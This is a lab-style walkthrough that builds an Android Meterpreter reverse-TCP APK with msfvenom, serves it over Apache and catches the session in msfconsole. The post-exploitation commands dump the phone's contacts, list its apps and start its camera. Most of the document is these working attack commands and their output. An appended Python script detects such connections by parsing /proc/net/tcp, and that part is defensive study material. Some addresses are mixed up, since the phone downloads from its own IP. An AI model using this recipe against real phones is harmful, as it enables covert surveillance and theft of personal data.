• Android IP Address: 192.168.22.167
  • host IP address: 192.168.22.20
  • KALI IP Address: 192.168.22.59
  • on Kali terminal1 to start apache2: #sudo service apache2 start
  • If you want to enable any service permanently: To start: #systemctl enable apache2 | To stop: #systemctl disable apache2
  • on Kali terminal1 ┌──(mrhacker㉿kali)-[/var/www/html]
    └─$ sudo service apache2 status
    ● apache2.service - The Apache HTTP Server
    Loaded: loaded (/lib/systemd/system/apache2.service; disabled; vendor preset: disabled)
    Active: active (running) since Thu 2021-08-19 07:31:40 EDT; 6s ago
  • on host browser check the status: http://192.168.22.59/index.html
  • on Kali terminal2: $ msfvenom --help
    MsfVenom - a Metasploit standalone payload generator.
  • on terminal1 Kali: ┌──(mrhacker㉿kali)-[~/Desktop]
    └─$ sudo msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.22.59 LPORT=4444 R > /home/mrhacker/Desktop/androidApp.apk
    [sudo] password for mrhacker:
    [-] No platform was selected, choosing Msf::Module::Platform::Android from the payload
    [-] No arch selected, selecting arch: dalvik from the payload
    No encoder specified, outputting raw payload
    Payload size: 10191 bytes
  • on terminal1 Kali: cp -p androidApp.apk /var/www/html/
  • on Android phone: Browser: http://192.168.22.167/androidApp.apk
  • on Kali terminal2: $ msfconsole
  • msf6 > use exploit/multi/handler
    [*] Using configured payload generic/shell_reverse_tcp
    msf6 exploit(multi/handler) > set payload android/meterpreter/reverse_tcp
    payload => android/meterpreter/reverse_tcp
    msf6 exploit(multi/handler) > show options
  • msf6 exploit(multi/handler) > set LHOST 192.168.22.167
    LHOST => 192.168.22.167
  • msf6 exploit(multi/handler) > exploit
    [-] Handler failed to bind to 192.168.22.167:4444:- -
    [*] Started reverse TCP handler on 0.0.0.0:4444
    [*] Sending stage (77002 bytes) to 192.168.22.167
    [*] Meterpreter session 1 opened (192.168.22.59:4444 -> 192.168.22.167:39505) at 2021-08-19 07:59:07 -0400
    meterpreter > background
  • msf6 exploit(multi/handler) > sessions
  • msf6 exploit(multi/handler) > sessions i 1
    Active sessions
    ===============
    Id  Name  Type                        Information          Connection
    --  ----  ----                        -----------          ----------
    1         meterpreter dalvik/android  u0_a209 @ localhost  192.168.22.59:4444 -> 192.168.22.167:39505 (192.168.22.167)

    msf6 exploit(multi/handler) > help

  • msf6 exploit(multi/handler) > sessions -i 1
    [*] Starting interaction with 1...
    meterpreter > pwd
    /data/data/com.metasploit.stage/files

meterpreter > ls -al
Listing: /
==========

Mode              Size  Type  Last modified              Name
----              ----  ----  -------------              ----
40554/r-xr-xr--   0     dir   2021-08-18 13:11:50 -0400  acct
40000/---------   4096  dir   2021-08-19 07:43:24 -0400  cache
40000/---------   0     dir   2021-08-18 13:11:50 -0400  config
40554/r-xr-xr--   0     dir   1969-12-31 19:00:00 -0500  d
….
100444/r--r--r--  2166  fil   1969-12-31 19:00:00 -0500  ueventd.smdk4x12.rc
40554/r-xr-xr--   4096  dir   2016-06-08 10:29:50 -0400  vendor

 

meterpreter > app_list
Application List
================

Name                           Package                                            Running  IsSystem
----                           -------                                            -------  --------
AASAservice                    com.samsung.aasaservice                            false    true
Active applications            com.sec.android.widgetapp.activeapplicationwidget  true     true
Adapt Sound                    com.sec.hearingadjust                              false    true
AllShare ControlShare Service  com.sec.android.allshare.service.controlshare      false    true
AllShare FileShare Service     com.sec.android.allshare.service.fileshare         false    true
Android System                 android                                            false    true
….
com.sec.phone                  com.sec.phone                                      false    true
ringtonebackup                 com.sec.android.app.ringtoneBR                     false    true
wssyncmlnps                    com.wssnps                                         false    true

meterpreter > dump_contacts
[*] Fetching 1 contact into list
[*] Contacts list saved to: contacts_dump_20210819081459.txt
meterpreter > camera_stream
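
Seen from the handset, the session above is an established TCP connection owned by app user u0_a209 to 192.168.22.59:4444. The Python below is an added example, not part of the original walk-through: it parses /proc/net/tcp text and flags app-owned connections to the LPORT used above. The sample table is constructed, and the code assumes IPv4 sockets on a little-endian device.

```python
import socket
import struct

SUSPECT_PORTS = {4444}   # LPORT used in the walk-through above
ESTABLISHED = "01"       # TCP state code used by /proc/net/tcp

# Constructed sample of /proc/net/tcp as it could look on the handset
# during the session shown above (not captured from a real device).
SAMPLE_PROC_NET_TCP = """\
  sl  local_address rem_address   st tx_queue rx_queue tr tm->when retrnsmt   uid  timeout inode
   0: 00000000:15B3 00000000:0000 0A 00000000:00000000 00:00000000 00000000  1000        0 4021
   1: A716A8C0:9A51 3B16A8C0:115C 01 00000000:00000000 00:00000000 00000000 10209        0 58113
   2: A716A8C0:C350 0E16A8C0:01BB 01 00000000:00000000 00:00000000 00000000 10087        0 58240
"""

def decode_endpoint(field):
    """'A716A8C0:9A51' -> ('192.168.22.167', 39505). IPv4 is little-endian hex."""
    addr_hex, port_hex = field.split(":")
    ip = socket.inet_ntoa(struct.pack("<I", int(addr_hex, 16)))
    return ip, int(port_hex, 16)

def android_user(uid):
    """Map a Linux UID to Android's uN_aM name (app UIDs start at 10000)."""
    user, app_id = divmod(uid, 100000)
    return f"u{user}_a{app_id - 10000}" if app_id >= 10000 else str(uid)

def find_suspect_sockets(proc_net_tcp, ports=SUSPECT_PORTS):
    """Return established connections from app UIDs to a watched remote port."""
    hits = []
    for line in proc_net_tcp.splitlines()[1:]:       # skip the header row
        cols = line.split()
        if len(cols) < 8 or cols[3] != ESTABLISHED:
            continue                                  # listening or closing sockets
        local, remote = decode_endpoint(cols[1]), decode_endpoint(cols[2])
        uid = int(cols[7])
        # System UIDs (< 10000) are ignored; only installed apps are reported.
        if remote[1] in ports and uid % 100000 >= 10000:
            hits.append({"user": android_user(uid), "local": local, "remote": remote})
    return hits

if __name__ == "__main__":
    for hit in find_suspect_sockets(SAMPLE_PROC_NET_TCP):
        print(hit)
```

A port match alone is a weak signal; pair it with the package name com.metasploit.stage that appears in the pwd output above.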